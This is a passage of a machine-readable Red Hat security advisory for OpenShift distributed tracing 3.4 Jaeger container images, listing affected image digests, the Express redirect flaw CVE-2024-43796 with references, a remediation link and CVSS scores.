3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "http-proxy-middleware: Denial of Service" }, { "cve": "CVE-2024-43796", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-10T15:30:28.106254+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311152" } ], "notes": [ { "category": "description", "text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", "title": "Vulnerability description" }, { "category": "summary", "text": "express: Improper Input Handling in Express Redirects", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-43796" }, { "category": "external", "summary": "RHBZ#2311152", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796", "url": "https://www.cve.org/CVERecord?id=CVE-2024-43796" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796" }, { "category": "external", "summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", "url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553" }, { "category": "external", "summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", "url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx" } ], "release_date": "2024-09-10T15:15:17.510000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 